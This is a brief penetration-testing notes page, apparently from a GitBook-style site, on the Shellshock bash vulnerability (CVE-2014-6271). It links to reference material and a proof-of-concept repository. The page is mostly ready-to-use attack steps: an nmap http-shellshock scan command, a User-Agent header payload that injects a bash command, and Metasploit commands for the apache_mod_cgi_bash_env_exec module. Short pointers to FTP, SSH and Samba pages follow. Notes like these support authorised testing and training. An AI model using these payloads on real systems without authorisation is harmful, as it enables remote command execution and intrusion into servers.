Linux

Shellshock vulnerability

https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf
PPT by owasp
LogoInside Shellshock: How hackers are using it to exploit systemsThe Cloudflare Blog
walkthrough of the vuln

PoC

https://github.com/opsxcq/exploit-CVE-2014-6271

nmap scan 

nmap $IP --script=http-shellshock --script-args "http-shellshock.url=/path/file.cgi

exploitation

User Agent: () { :; }; echo; echo; /bin/bash -c 'type your cmd here'

metasploit

use exploit/multi/http/apache_mod_cgi_bash_env_exec

#options:
set RHOSTS $IP
set TARGETURL /path/to/file.cgi
exploit

FTP

  • for FTP you can refer to:

FTP

SSH

  • refer this page for ssh:

SSH

Samba

  • for samba refer:

Samba (SMB)

PreviousHost & Network PentestNextChecklist (priv esc)

Last updated